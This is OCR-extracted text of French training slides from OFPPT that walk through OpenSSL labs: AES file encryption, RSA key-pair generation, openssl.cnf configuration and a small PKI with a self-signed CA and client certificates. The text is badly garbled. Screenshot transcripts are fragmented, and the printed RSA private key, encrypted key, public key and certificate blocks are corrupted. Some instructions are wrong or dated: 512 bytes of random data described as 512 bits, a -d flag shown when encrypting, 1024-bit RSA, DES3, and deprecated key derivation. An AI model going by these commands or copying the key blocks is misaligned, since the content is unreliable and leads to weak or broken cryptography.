e Pour générer une clé symétrique, nommé Key, de taille 512 bits, il suffit d'exécuter la commande: openssl rand -out Key 512 
e Pour chiffrer le fichier message avec l'algorithme AES-256 et la clé Key, il suffit d'exécuter la commande suivante : 
openssl aes-256-cbc -in message -out messageAES.enc -e -k Key 
e Pour déchiffrer le fichier messageAES.enc, il suffit d'exécuter la commande suivante : openssl aes-256-cbc -in messageAES.enc -out messageAES.dec -d -k Key 
e Pour vérifier que les deux fichiers message et messageAES.dec contiennent le même contenu, il est possible d'exécuter la commande : diff message messageAES.dec 
e Les résultats de l'exécution des commandes précédentes sont illustrés dans la figure ci-dessous. 


:-$ openssl rand -out Key 512 
:-$ openssl aes-256-cbc -in message -out messageAES.enc -d -k Key 


bad magic number 

:-$ openssl rand -out Key 512 

:-$ openssl aes-256-cbc -in message -out messageAES.enc -e -k Key 
*** WARNING : deprecated key derivation used. 


Help 


| Using -iter or -pbkdf2 would be better. 
| :-$ openssl aes-256-cbc -in messageAES.enc -out messageAES.dec -d -k Key 
*** WARNING : deprecated key derivation used. 
oc Using -iter or -pbkdf2 would be better. 
` :-$ diff message messageAES. dec 
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GÉNÉRATION DE CLÉ PRIVÉE/PUBLIC RSA 


Compétences visées : 


e Générer une paire de clé privé/publique en utilisant 
l'algorithme RSA 


Recommandations clés : 


e Maitriser le principe d’un système de chiffrement 
asymétrique (en particulier l'algorithme RSA) 


l CONSIGNES 
LO WEBFORCE + 


OFPPT BE THE CHANGE Le F 


La Voie de l'Avenir 


1. Pour le formateur 


° Vapprenant doit être capable de générer une paire de clé privée/publique 


2. Pour l’apprenant 


° Il est recommandée de maitriser le principe de l'algorithme RSA 
° Il faut utiliser les commandes fournies au début de l’activité 
° ° Il est également recommandée de suivre les étapes décrites dans l'énoncé 


. 3. Conditions de réalisation : 


p ° VirtualBox installé 
° Une machine Virtuelle Ubuntu qui a été utilisée dans l’activité 2 


4. Critères de réussite : 


° Générer avec succès une paire de clé RSA (privée/publique) 


Activité 3 KO 


Génération de clé privée/public RSA res 


Présentation des commandes de génération de clés RSA dans OpenSSL 


e L'objectif principal de cette activité est de générer le couple de clé privée/public de l'algorithme RSA avec OpenSSL. 


e Le tableau ci-dessous fournit les commandes nécessaires pour la gestion de clés RSA: 


openssl genrsa -out <fichier_rsa.priv> <size> Génère la clé privé RSA de taille size (512, 1024, etc.). 


openssl rsa -in <fichier_rsa.priv> -des3 -out <fichier.pem> Chiffre la clef privé RSA avec l’algorithme DES3. 


Stocke la clé publique dans un fichier a part. Cette commande permet de créer la 


openssl rsa -in <fichier_rsa.priv> -pubout -out <fichier_rsa.pub> ; j P npor 
P un P —fsa-P clé publique associée a la clef privée RSA. 


openssl rsa -in key -check -modulus -text Vérifie la clé privée RSA. Plusieurs options peuvent étre utilisées. 


openssl rsa -pubin -in pubkey -text Vérifie la clé public RSA. 
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Travail demandé 


* Comme présenté précédemment, l'objectif principal de cette activité est d’utiliser OpenSSL pour générer une couple de clés privée/public RSA. Pour ce faire, vous êtes 
chargés de réaliser les tâches suivantes : 


1. 


2 
3 
4 
5. 
6 
7 


Générez une clé privée, nommée Key.priv, de taille 1024 ; 

Vérifiez la clé privée générée, utilisez toutes les options ; 

Chiffrez la clef privée générée précédemment avec l'algorithme DES3. Le fichier résultant est nommé Key.pem ; 
Utilisez la commande cat pour afficher le contenu de la clé privée chiffrée Key.pem ; 


Générez la clé publique correspondante, qui est nommée Key.pub ; 


Vérifiez la clé publique générée ; 


Utilisez la commande cat pour afficher le contenu de la clé publique. 
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e Pour générer la clé privée Key. priv, il suffit d’exécuter la commande suivante : openssl genrsa -out Key.priv 1024 


:-$ openssl genrsa -out Key.priv 1024 
Generating RSA private key, 1024 bit long modulus (2 primes) 


.+++++ 


.. . .t+++++ 
e is 65537 (0x010001) 


e Pour vérifier la clé privée générée, il suffit d'exécuter la commande : openssl rsa -in Key.priv -check . Il est aussi possible d’utilizer d’autres options. 


Le résultat de la commande openssl rsa -in Key.priv -check Le résultat de la commande openssl rsa -in Key.priv -modulus 


:-$ openssl rsa -in Key.priv -check 
RSA key ok : ‘ in Key.priv -modulus 


OFPPT 
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writing RSA key AD8C83 33F53 SBB3G5F97FFOCSBEAS 193A C137 CSBF é 764CABDA1B7285C39 
BEGIN RSA PRIVATE KEY | 3 G8EBCF13CB69E51303B0E4591720037 56 C560158A78D828BD333 


MIICXAIBAAKBgQCnuoryY yDVwyUwz9TVHe7 swX5 f /DFvqkZOpj ZOME3xb8X fk+qHx 
95qq1XZMq9obcgXDkswPn+1U5Tmj F3xtkrd2NOzuD6uLC9K5bF5ha0vPE8t p5RMD 
SORZFyDT cuDSUMIJwwBHFDRW6 cCNsovTM8DDL TwdSAxTpSWMY5 IUyvGE5 j UQIDAQAB 
AOGAD8U4XN2m0K6UnaYG LmwJ661IJUA/HbKy3Z4/KObdzT+nkKThtKsseHIGwxruU/T + mAg ; ES jUQTDAQAB 
0OBVmeVcKHMX6uKq82qSX/G15FLS1nqpe8yu00JCF9SY6GkKG7rMtyDnrzFeANJKXd a4) A A/ 2 ThtKsseHTGuxrU/T 
oe o9a66ReDEgV3KfsA+5uqq6gQ7Uaal tu+UFXEEDt+YR1b54kCQODT2gK4uzHO3Gwy : 9 G7 X 
ue YaiAOpA2NKkYg8plP138RoldZg01il1yWP+MuD319KJ8srqgC10cauF9wru7hbOSEDyX 
LU qynl/dJ/AkEAyq6ij alY0+EgrSDMAngd0JGgxRadMIIc8daxu7Y1jhxOGoVW5FYg 
fon +k+J9ShEuAuGmdeLyxcKU2 f xwRwNaZBCLwJASsworkDLzKI5wf JSADPP2IKBcAGQ 
laa IOYwXC5SVLy9h+31xQHf+tQSt96hs+HSm9w82NS f LELOcTVLSIAn2jm8eywJAEEew ) ly ) vL : e 
a pumuNNaQWVeZC1m6 f yCzWwSFH3u2UhZhIDLrEUnXWnYq4P/7rBy/8VMS30FEsro6x U Nez awn MSIOF ES r06x 
a. m85t9eUTdf9a16/R4QJBALtN22T50qXkK1viWC71UrrzzKAjmOKZpyxJDh002Kha CH FIEVA QE LENS AUSDIRS SZ xia de ; 
NTWH2EVAKS39yOhpqPt LJSEz FHUFXSL1U6D1RjSZxM= y 
END RSA PRIVATE KEY 
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Chiffrement/déchiffrement asymétrique grâce à openSSL 


Pour chiffrez la clef privée générée précédemment avec l'algorithme DES3, exécutez la commande suivante : openssl rsa -in Key.priv -des3 -out Key.pem 


7 e7 


$ openssl rsa -in Key.priv -des3 -out Key.pem 


writing RSA key 
Enter PEM pass phrase: 
Verifying - Enter PEM pass phrase: 


Pour afficher la clé privée chiffrée Key.pem, exécutez : cat Key.pem 


:-$ cat Key.pem 
BEGIN RSA PRIVATE KEY 
Proc-Type: 4,ENCRYPTED 
DEK-Info: DES-EDE3-CBC,B6FBE9608B5A1449 


IgESVrUknxfZLLATIRZ1LI7+IMLSalTmzvTvfYD56ns/V+ibCJ4vtntMkweymih9 
OeU3Wm3ILupTAs]6GpzSubgOZkYy9riy4sgj daZE5nU3JhmNSE38c4xrtrvds2ux 
urdLD46B8 lL+qUBqUOzJmaxtrmaHKkmSuOT7v28+VQAKhriETXWF4VaabA2cih8E5 
f+tZgPFBkKOdVAr8CNVV6RS3SMGoO4 1w7stJyf sxX4UIRDT pdAg+6bZiWnZ2AVXz5Z 
iBINPDsT8DuPOLOvyDvpD/9GGHj KN6T64xR6 LxuTKBpr8dwZILwDp5Vp/Xj srgQw 
BHegNZRLBmPY L5ipAC9Mw4+3upZG3u0FiyMQcIPa+2Rz6+6G6+5JZ19xSYM+p LO6X 
vtZ2o0LTJIkASqMhmc j 6GaJFFog2PHg4/8G17sYovdvqj Nfg3qp3UpKxXilHAeQcmSt 
k7Mxp1r8S j TOWjQQ31Dy8GyGx j kqzcZBgo lmuOnMkH9X+pOBPANVXZK2VFNOG863 
JmjezbGzV6iVUbY j 6RulebLj scJvMVmsX0D15g0u4D31enl j 4DKVH2ONgMsPgL7X 
jPO6NZYeSUWPmAlqCFpfXF9ekt9mrgGJeBocZujNl fR8DXXe+nehgKo8UIlK3rdI 
sz9whH1213rp37pqa8zZgf@FXJ/pGoPOvASNSRA0037F06Qu42g5 jHEcCS fDvrlCTUK 
61S0AxxaSwlDAïQqggmRFQQjF9b7fSMS/c00Y7JdAkb]TGlq/ER5Jnk4lLc36/RO 
Mrku7AlLic2zV9hrXSK9S5VYqU38Y6RvIdPAHZr4tTttdwvlauYWrOA== 
END RSA PRIVATE KEY 
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Chiffrement/déchiffrement asymétrique grace a openSSL | 


Chiffrement/déchiffrement asymétrique grace a openSSL 


e Pour générer la clé publique Key.pub, il suffit d'exécuter la commande suivante : openssl rsa -in Key.priv -pubout -out Key.pub 


$ openssl rsa -in Key.priv -pubout -out Key.pub 


writing RSA key 


e Pour vérifier la clé publique générée, il suffit d'exécuter la commande : openssl rsa -pubin -in Key.pub -text 


:-$ openssl rsa -pubin -in Key.pub -text 
RSA Public-Key: bit) 
Modulus: 


SPA Mae Kove y jie 10: 
: 65537 (0x10001) 


KEY 
MIGTMAOGCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCnuorYyDVwyUwz9TVHe7 swXx5 f / 
DFvqkZOpj ZOME3xb8Xf k+qHx95qg1XZMq9obcgXDkswPn+1U5Tmj f3xtkrd2NOzu 
D6uLC9k5bF5ha0vPE8tp5RMDSORZFyDT cuD9UMJwwBHFDRW6cNsovTM8DDL TwdSA 
XTpSWMY5 IUyvGE5 j UQIDAQAB 

END PUBLIC KEY 
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GÉNÉRATION DES CERTIFICATS AVEC 
OPENSSL 


Compétences visées : 


e Configurer OpenSSL 
e Générer des certificats auto-signés 


e Générer des certificats clients 


Recommandations clés : 


e  Maitriser le principe des certificats numériques 


e  Maitriser les notions de base d’une PKI 


CONSIGNES 


WO  WEBFORCE» 


BE THE CHANGE | 


La Voie de l'Avenir 


1. Pour le formateur 


° Vapprenant doit être capable de configurer le fichier openssl.cnf 


° Il doit être également capable de générer un certificat auto-signé pour le CA et Des 
certificats clients 


2. Pour l’apprenant 


° Il est recommandée de maitriser les notions de base d’une PKI 
e Il faut utiliser les commandes fournies au début de l’activité 
° Il est également recommandée de suivre les étapes décrites dans l'énoncé 


3. Conditions de réalisation : 
° VirtualBox installé 
° Une machine Virtuelle Ubuntu qui a été utilisée dans l’activité 2. 


° Réalisation des activités précédentes (2 et 3) avec succès. 


4. Critères de réussite : 
° Configurer avec succès l'outil OpenSSL 
e Avoir un certificat auto-signé 


b Avoir un certificat client signé par le CA 


Activité 4 | 
Génération des certificats avec OpenSSL D 


Présentation des objectifs 


e l'objectif principal de cette activité est de mettre en place une plateforme PKI à l’aide d’OpenSSL afin de générer des certificats clients X.509. 


e Cette activité sera organisée en trois étapes : 


e Étape 1 : Configuration du fichier openssl.cnf ; 


e Étape 2 : Génération d'un certificat auto-signé (le certificat du CA) ; 


e Étape 3 : Génération des certificats clients. 
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Étape 1 : Configuration du fichier openssl.cnf 


Sem WEBFORCE + 


à Vote de teen 


e Le but de cette étape est d'éditer le fichier de configuration 'openssl.cnf’. En fait, à traves ce fichier, il est possible de définir certaines informations importantes. II est 


également possible de définir les chemins des principaux répertoires de la plateforme PKI à mettre en place. 
e Acet effet, il vous est demandé de réaliser les tâches suivantes : 
1. Modifiez le fichier de configuration openssl.cnf qui se trouve dans le chemin suivant /etc/ssl/openssl.cnf comme suit : 
i. Dans la section relative au CA [ CA default ] 
ii. 
[ CA_default ] 
dir = /etc/activite # Le dossier où tout est gardé 
certs = Sdir/certs # OU les certificats délivrés sont conservés 
crl_dir = Sdir/crl # Où sont conservées les crl émises 
database = Sdir/index.txt # Fichier d'index de la base de données. 
new_certs_dir = Sdir/newcerts # Emplacement par défaut pour les nouveaux certificats. 
certificate = Sdir/cacerts/ofpptcacert.pem # Le certificat du CA 
serial = Sdir/serial # Le numéro de série actuel 
crinumber = Sdir/crinumber # Le numéro crl actuel 
crl = Sdir/crl.pem # Le CRL actuel 
private_key = Sdir/private/ofpptcakey.pem # La clé privée 


iii. Dans la section [req] remplacer les valeurs des champs suivants par 


default_bits = 1024 


default_keyfile = privatekey.pem 
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Étape 1 : Configuration du fichier openssl.cnf 
iii. Dans la section [req _distinguished_ name] 


countryName_default = MA 
stateOrProvinceName_default = MAROC 
localityName_default = NEW_CITY 


O.organizationName_default = OFPPT 
organizationalUnitName_default = SECURITY 


2. Créez le répertoire activite, sous /etc 
3. Créez tous les répertoires (certs, cacerts, private, reqs) sous /etc/activite comme configurés dans le fichier openssl.cnf 
e private contient des fichiers de clés privées RSA ; 
e certs contient des certificats d'entité finale X.509 ; 
e — newcerts contient les nouveaux certificats ; 
e  cacerts contient des certificats CA fiables ; 
e — reqs contient des demandes de certificat X.509. 


4. Créez les deux fichiers suivants sous /etc/activite : 


(ag) 
= 
| 
< 
a. 


e  index.txt qui contient la liste des certificats créés ; 


e serial qui contient le prochain numéro de série à utiliser. 
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Étape 1 : Configuration du fichier openssl.cnf 


5. Pour initialiser les fichiers cités précédemment, vous devez exécuter les commandes suivantes : 
e sudo touch index.txt 
e sudo touch serial 


e  #echo 01 > serial (cela créera un fichier contenant le numéro 1 comme premier numéro de série pour le futur certificat). 
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Étape 2 : Génération d'un certificat auto-signé 
e Cette étape vise à générer le certificat du CA (Certification Autority) qui est un certificat auto-signé. 


e Le tableau ci-dessous fournit les commandes nécessaires pour la génération d’un certificat auto-signé. 


Permet de générer une clé privée CApriv.pem de taille size et chiffrée avec l'algorithme 


openssl genrsa <-algo> -out <CApriv.pem> <size> j 
: 5 = eect oes de chiffrement algo. 


-new -x509 : new combiné avec x509 signifie 
qu'un certificat X509 auto-signé sera généré. 


Permet de générer un certificat -days : indique le nombre de jours de validité 
autosigné CA, nommé du certificat. 

CA_certificate.pem d’une validité 
certificate _validity_period en utilisant 
la clé privé CApriv.pem. 


openssl req -new -x509 -days<certificate_validity_period> - 
key<Capriv.pem> -out<CA_certificate.pem> -key : pointe sur la paire de clés RSA 
Noté qu’il faut spécifier le chemin (relatif ou 


absolue) de la clé. 


-out : définit le nom du fichier de certificat. 
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Génération des certificats avec OpenSSL 


Étape 2 : Génération d'un certificat auto-signé 
e I] vous est demandé dans cette étape de réaliser les tâches suivantes : 
1. Générez une clé privée pour le CA, tel que 
e Le nom de la clé est : ofpptcakey.pem ; 
e La taille de la clé est : 2048 bits; 
e Laclé est chiffrée avec l’algoritghme DES3 ; 


e Laclé doit être enregistrée dans l'emplacement adéquat : /etc/activite/private. 


2. Générez le certificat auto-signé du CA, en utilisant la clé privée générée précédemment, tel que : 
e Lenom du certificat est : ofpptcacert.pem ; 
e La validité du certificat est : 4 ans (365joursx4=1460jours) ; 


e Le certificat doit être enregistré dans l'emplacement adéquat : /etc/activite/cacerts ; 


e Noté que lors de la génération du certificat, vous devez conserver les informations du CA par défaut qui ont été configurés précédemment dans le 


fichier openssl.cnf. 


3. Affichez le certificat généré avec la commande cat ; 


4. Visualisez le certificat généré en mode graphique. 
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Etape 3 : Génération des certificats clients 


e Cette étape vise a générer les certificats clients qui doivent être signés par un CA. 


e Le tableau ci-dessous fournit les commandes nécessaires pour la génération d’un certificat client. 


Permet de générer une clé privée clientpriv.pem de taille size et chiffrée avec 


openssl genrsa <-algo> -out <clientpriv.pem> <size> : : 
P 8 8 RIME l'algorithme de chiffrement algo. 


-new : combiné avec req permet la génération 


Permet de générer une requête client, : x 
d’une nouvelle requête. 


nommé clientrequest.pem en utilisant 


la clé privé clientpriv.pem. -key : pointe sur la paire de clés RSA 


openssl req -new -key <clientpriv.pem> -out <clientrequest.pem> n ue à Noté qu'il faut spécifier le chemin (relatif ou 
Cette requête est générée auprès du i 
absolue) de la clé. 


CA pour l'obtention d’un certificat 
client par la suite. -out : définit le nom du fichier sortant. 


Permet de générer un certificat client clientcertificate.pem signé par le CA à partir de la 


openssl ca -in <clientrequest.pem> -out <clientcertifcate.pem> À i : 
requéte client clientrequest.pem. 


Permet de vérifier la validité du certificat client clientcertifcate.pem au près du CA. 


openssl verify -CAfile <CA_certificate.pem> <clientcertifcate. > so a 
P fy = p E Sachant que CA_certificate.pem est le certificate du CA. 


m 
= 
| 
< 
A. 


Copyright - Tout droit réservé - OFPPT 


Activité 4 \ KO WEBFORCE » 


pE THE CHANGE | 


172 


La Vans are 


Activité 4 | WO WEBFORCEs. 


Hi HANGE 
Génération des certificats avec OpenSSL } mm 


Etape 3 : Génération des certificats clients 


e I] vous est demandé dans cette étape de réaliser les tâches suivantes : 
1. Générez une clé privée pour un client A, tel que 
e Le nom de la clé est : ClientAkey.pem ; 
e La taille de la clé est : 1024 bits ; 


e Laclé est chiffrée avec l’algoritghme DES3 ; 


e Laclé doit être enregistrée dans l'emplacement adéquat : /etc/activite/private. 


2. Générez la requête client, en utilisant la clé privée générée précédemment, tel que : 
e Lenom du fichier contenant la requête est : ClientArequest.pem ; 
e La fichier de la requête doit être enregistrée dans l'emplacement adéquat : /etc/activite/reqs ; 


e Noté que lors de la génération de la requête client, vous devez conserver les informations générales mais il faut saisir certains informations du client. 
Pour ce faire : 


e Le nom du client doit être saisi dans le champ Common Name. La valeur attribuée peut être ClientB. 


e Le mail du client doit être saisi dans le champ Email Address . La valeur attribuée peut être clientA@gmail.com. 
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Générez le certificat du client A qui est signé par le CA, en utilisant la requéte générée précédemment, tel que : 
e Lenom du certificat est : ClientAcertificate.pem 
e Le certificat doit être enregistré dans l'emplacement adéquat : /etc/activite/certs 

Vérifiez la validité du certificat généré ; 

Affichez le certificat généré avec la commande cat ; 

Visualisez le certificat généré en mode graphique ; 


Répétez les tâches précédentes (1-27) pour générer un deuxième certificat client pour un client B. 
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La figure ci-dessous illustre la configuration finale de la section CA [ CA_ default ] 
dans le fichier openssl.cnf 


PRIS EPSP RAPE RSE ESHER SE AAS ERE EAS ESS RARE AE RSS RARES ARA EHA 


dir 

certs 

erdir 
database 
#unique subject 


/etc/activite 
$dir/certs 


Where everything is kept 

Where the issued certs are kept 

$dir/crl Where the issued crl are kept 

$dir/index.txt database index file. 

no # Set to 'no' to allow creation of 

# several certs with same subject. 
default place for new certs. 


new certs dir $dir/newcerts 
certificate 
serial 
crlnumber 


$dir/cacerts/ofpptcacert.pem # The CA certificate 
$dir/serial # The current serial number 
$dir/crlnumber # the current crl number 


# must be commented out to leave a V1 CB 


crl 
private key 


$dir/crl.pem # The current CRL 
$dir/private/ofpptcakey.pem# The private key 


# The extensions to add to the cert 


x509 extensions = usr cert 
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La figure ci-dessous illustre la configuration finale de la section [req] dans le 
fichier openssl.cnf 


HR RER EEE RER 


default bits 
default keyfile 
distinguished name req distinguished name 
attributes req attributes 


= 1024 
x509 extensions = v3 ca # The extensions to add to the self signed cert 


privatekey.pem 


on qu ticnier openssi.cnT 


La figure ci-dessous illustre la configuration finale de la section [req _distinguished_ name] 
dans le fichier openssl.cnf 


countryName 
countryName default 
countryName min 
countryName max 


Country Name (2 letter code) 
MA 

2 

2 


State or Province Name (full name) 
MAROC 


stateOrProvinceName 
stateOrProvinceName default 


localityName Locality Name (eg, city) 
localityName default NEW CITY 


0.organizationName Organization Name (eg, company) 
0.organizationName default OFPPT 


# we can do this but it is not needed normally :-)#1.organizationName 
#1.organizationName default = World Wide Web Pty Ltd 


organizationalUnitName Organizational Unit Name (eg, section) 
organizationalUnitName default SECURITY 


KO 
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i j OFPPT pe THE CHANGE 
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Étape 1 : Configuration du fichier openssl.cnf 


e La figure suivante illustre le résultats des commandes permettant la création des répertoires activité, sous /etc ainsi que certs, newcerts, cacerts, private, et reqs sous 
/etc/activite comme configuré dans le fichier openssl.cnf. 


e Les commandes exécutées sont les suivantes : 


e cd /etc 
e sudo mkdir activate :-$ cd /etc/ 
ni $ sudo mkdir activite 
$ cd activite 
$ sudo mkdir private 


e sudo mkdir private 


e sudo mkdir certs 


$ sudo mkdir certs 
$ sudo mkdir cacerts 
$ sudo mkdir reqs 


e sudo mkdir newcerts 


e sudo mkdir cacerts 


e sudo mkdir reqs 
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i OFPPT THE CHANGE 
Correction ij SE 


Étape 1 : Configuration du fichier openssl.cnf 


e Les figures ci-contre illustrent le résultats des commandes permettant la création et l’initialisation des fichiers index.txt et serial. 
e Les commandes exécutées sont les suivantes : 

e sudo touch index.txt 

e sudo touch serial 

e sudo su 

e #echo 01 > serial 


e #cat serial 


$ sudo touch index.txt 
$ sudo touch serial 


root@osboxes:/etc/activite# echo 01 > serial 
root@osboxes:/etc/activite# cat serial 
01 
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BE THE CHANGE 


Generation a un rtificat auto-s 


1. Pour générer la clé privée pour le CA en respectant l'énoncé, il suffit d'exécuter la commande suivante : sudo openssl genrsa -des3 -out private/ofpptcakey.pem 2048 


$ sudo openssl genrsa -des3 -out private/ofpptcakey| 


.pem 2048 
Generating RSA private key, 2048 bit long modulus (2 primes) 


e is 65537 (0x010001) 
Enter pass phrase for private/ofpptcakey.pem: 
Verifying - Enter pass phrase for private/ofpptcakey.pem: 


2. Pour générer le certificat auto-signé du CA, en respectant l'énoncé, il suffit d'exécuter la commande : 
sudo openssl req -new -x509 -days 1460 key private/ofpptcakey.pem -out cacerts/ofpptcacert.pem 


-e$ sudo openssl req -new -x509 -days 1460 -key priva 
te/ofpptcakey. pem ai Pre Pate cet pem 
Enter pass phrase for private/ofpptcakey.pem: 
You are about to be asked to enter information that will be incorporated 
into your certificate request. 
What you are about to enter is what is called a Distinguished Name or a DN. 
There are quite a few fields but you can leave some blank 
| For some fields there will be a default value, 
an) If you enter '.', the field will be left blank. 


Country Name (2 letter code) [MA]: 
State or Province Name (full name) [MAROC]: 
i Locality Name (eg, city) [NEW_CITY]: 
a Organization Name (eg, company) [OFPPT]: 
Organizational Unit Name (eg, section) [SECURITY]: 
` Common Name (e.g. server FQDN or YOUR name) []: 
aa Email Address []: 
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Etape 2 : Génération d'un certificat auto-signé 


Le résultat de l'affichage du certificat du CA en exécutant la commande 


cat cacerts/ofpptcacert.pem 


= $ cat cacerts/ofpptcacert.pem 
BEGIN CERTIFICATE 
MIIDhzCCAm+gAwIBAgIUYLadggoi74j0zgapxdFMQo3ceEQwDQYJKoZIhvcNAQEL 
BQAwUZELMAkGA1UEBhMCTUEXD j AMBgNVBAgMBU1BUK9DMREwDwYDVQQHDAhORVdf 
QO LUWTEOMAWGA1UECgwFTOZQUFQxETAPBgNVBASMCFNFQ1VSSVRZMB4XDTI yMDMx 
OTIwWMDcOMFoXDTI2MDMxOD IwMD cCOMFowUZELMAkKGA1UEBhMCTUEXD j AMBgNVBAgM 
BU1BUK9DMREwDwYDVQQHDAhORVd f QO LUWTEOMAWGA 1UECgwFTOZQUFQXxETAPBgNV 
BASMCFNFQ1VSSVRZMIIBI j ANBgkqhkiG9wOBAQEFAAOCAQ8AMI IBCgKCAQEAO/03 
60Xp+6NBw7sGT/SiPyiEWCRCj4YhBgl70rxt2a7YQeyPFol8HgG6ee4ANUFSGFIH 
QhPVnn07S7YC5E1I9aNG5 LF4JeISGqNlcXsRvdsbSGm5kYySxQFWiy8pgs fmKZthj 
tyzhaleV23jLnpjpOnPoh/y6np/vSMMs+wNVQih8+fMYbiC9mLJqgOmAwQUD84/S 
Su6E8GKbmj q44saCLvw4HEmXVd@eoJoaFBCWO0Om/WpNJz/04p5pjtN5CMLaXQ47G 
vfa+7vD5Gc5nLSo+QyiCpDHizAsEnj YwHsct8KRZCkj iidDKrqckissKS1FFQnmm 
i2zZPdAKSRBU9fwtL7QIDAQABo1MwUTAdBgNVHQ4EFgQU9kg44XzWwn2rh5pLu3Fc 
yi0kT2QwHwYDVROj BBgwFoAU9kg44XzWwn2rh5pLu3Fcyi0kT2QwDwYDVROTAQH/ 
BAUWAWEB/ ZANBgkqhkiG9wOBAQsFAAOCAQEAL5h0kPg2PUB0rEavB2sHJCghmanM 
vJPuYIYiyN3cGQTmmhD4FehVppQMSeD8 j s/W598KPPKaqRRRv4M8e3J vuG/h4nLy 
2pcqw5wF J8IvyDn9lo03EQwYysS LhWv8x5y010j yaHttZK//Pil5eRiX3FSERLSS 
RDO+dYBC fG7mIRDY7CePcYFcZqG/2g7W/YGeNBWoAj RIBrPnpbdd4rvKEXxy j XaA8 
1Rxgw+16zw6Zfkf4Xt03Z+dXGh5DLt3EDmQvrwkeRfbmK4IIydSgxOr0EN9y/bHL 
5SInKLxv6/ndSBpfJOwLmuPeZQy fj IKMS5kWKOC9UXnNCZ9bDKN LHUwXmsWcQ== 

END CERTIFICATE 


Se WEBFORCE ~ 


pE THE CHANGE 


Le résultat de l'affichage du certificat du CA en mode graphique 


ofpptcacert.pem 


ofpptcacert.pem 
identity 
Verified by 
Expires: 03/18/2026 


Subject Name 


C (Country): 
ST (State): 
L (Locality): 
O (Organization): 

OU (Organizational Unit): 


issuer Name 
C (Country): 
ST (State): 
L (Locality): 


MA 
MAROC 
NEW_CITY 
OFPPT 
SECURITY 


MA 
MAROC 
NEW_CITY 


O (Organization): OFPPT 
OU (Organizational Unit): SECURITY 


issued Certificate 

Version: 3 

Serial Number: 60 B6 9D AA OA 22 EF 88 CE CE 
66 AS C5 D1 4C 42 8D DC 78 44 

Not Valid Before: 2022-03-19 


Close 
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Étape 3 : Génération des certificats clients 


1. Pour générer la clé privée du client A en respectant l'énoncé, il suffit d'exécuter la commande suivante : sudo openssl genrsa -des3 -out private/ClientAkey.pem 1024 
$ sudo openssl genrsa -des3 -out private/ClientAkey 


.pem 1024 
Generating RSA private key, 1024 bit long modulus (2 primes) 


e is 65537 (0x010001) 
Enter pass phrase for private/ClientAkey.pem: 
Verifying - Enter pass phrase for private/ClientAkey.pem: 


2. Pour générer la requête du client A, en respectant l'énoncé, il suffit d'exécuter la commande : 


sudo openssl req -new -key private/ClientAkey.pem -out reqs/ClientArequest.pem 


: $ -new -key private/ClientAkey.pe 

/ClientArequest.pem 
hrase for private/C 
+ + 


L be incorporated 


inguished Name or a DN. 
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) attributes 
certificate request 
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Étape 3 : Génération des certificats clients 


3. Pour générer le certificat du client A qui est signé par le CA, il suffit d'exécuter la commande suivante : 


sudo openssl ca -in reqs/ClientArequest.pem -out certs/ClientAcertificate.pem 


phrase for 


t the request matches 


(365 days) 


4. Pour vérifier la validité du certificat généré, il suffit d’exécuter la commande : sudo openssl verify -CAfile cacerts/ofpptcacert.pem certs/ClientAcertificate.pem 


(ag) 
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- $ sudo openssl verify -CAfile cacerts/ofpptcacert.p 
em certs/ClientAcertificate.pem 


certs/ClientAcertificate.pem: OK 


Activité 4 \ WO  WEBFORCE» 


OFPPT pE TE CHANGE 
Correction || 
Étape 3 : Génération des certificats clients 
Le résultat de l'affichage du certificat du client A en exécutant la commande : Le résultat de l'affichage du certificat du Client A en mode graphique 


cat certs/ClientAcertificate.pem ClientAcertificate.pem 


Certificate 

Data: 
Version: 3 
Seriel M 
Signeture 


Issue 


ClientA 
identity: ClientA 
Verified by 
Expires: 03/19/2023 


Subject Name 
C (Country): MA 
ST (State): MAROC 
O (Organization): OFPPT 
OU (Organizational Unit): SECURITY 
CN (Common Name): ClientA 


clientA@gmail, com 


EMAIL (Email Address): clientA@gmailcom 


Issuer Name 
C (Country): MA 
ST (State); MAROC 
L (Locality): NEW CITY 
O (Organization): OFPPT 
OU (Organizational Unit); SECURITY 


Issued Certificate 
Version: 3 
Serial Number: 61 
Not Valid Before: 2022-03-19 
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:/eti i $ sudo openssl genrsa -des3 -out private/ClientBkey.pem 1024 
Generating RSA private key, 1024 bit long modulus (2 primes) 


e is 65537 (0x010001) 
Enter pass phrase for private/ClientBkey.pem: 
Verifying - Enter pass phrase for private/ClientBkey.pem: 


8. Pour générer la requête du client B, en respectant l'énoncé, il suffit d'exécuter la commande : 


sudo openssl req -new -key private/ClientBkey.pem -out reqs/ClientBrequest.pem 


$ sudo openssl req -new -key private/ClientBkey.pem -out regs/ClientBrequest.pe 
m 
Enter pass phrase for private/ClientBkey.pem: 
You are about to be asked to enter information that will be incorporated 
into your rtificate request. 
What you about to enter is what is called a Distinguished Name or a DN, 
There are quite a few fields but you can Leave some blank 
For some fields there will be a default value, 
If you enter '.", the field will be left blank. 


Country Name (2 Letter code) [MA]: 
2} State or Province Name (full na 
Locality Name (eg, city} [NEW CI 
Organization Name (eg, company) [0 
Organizational Un Name (eg, section) [S TY]: 
Common Name (e.g. server FQDN or YOUR name) []:ClientB 
Email Address []:clientB@gmail.com 


Please enter the following ‘extra’ attributes 
sent with your certificate request 
lenge password []:1234 

An optional company name []: 


OFPPT pe THE CHANGE 
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9. Pour générer le certificat du client B qui est signé par le CA, il suffit d'exécuter la commande suivante : 


sudo openssl ca -in reqs/ClientBrequest.pem -out certs/ClientBcertificate.pem 


ca -in regs/ClientBrequest.pem -out certs/ClientBcertificate.pem 


cnf 
ofpptcakey.pem 
reques 


Details: 

ial Number: 
Validity 

Not Before 

Not After 


MA 
MAROC 
OFPPT 

SECURITY 

Clients 
clientBé@gnail.com 


organizationNe 


organizationalUnitName 
conmmonNane 
mailAddress 


oe | 


OpenSSL G Certificate 
X509v23 Subject y ntifier 
47:4D:C5:080:01:34:40:1F:83:94:1C:9D:E8 


):AB:687:9A:4B:BB:71:5C:CA:23:A4:4F:64 


certified until Mer 19 28:41:51 2923 GMT (365 days) 


10. Pour vérifier la validité du certificat généré, il suffit d'exécuter la commande : sudo openssl verify -CAfile cacerts/ofpptcacert.pem certs/ClientBcertificate.pem 


$ sudo openssl verify -CAfile cacerts/ofpptcacert.p 


em certs/ClientBcertificate.pem 
certs/ClientBcertificate.pem: OK 
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Étape 3 : Génération des certificats clients 


Le résultat de l'affichage du certificat du client B en exécutant la commande : 


cat certs/ClientBcertificate.pem 


$ cat certs/ClientBcertificate.pem 
Certificate: 
Data: 
Version: 3 (0x2) 
Serial Number: 2 
Signature Algorithm: 
Issuer: C=MA, 
Validity 
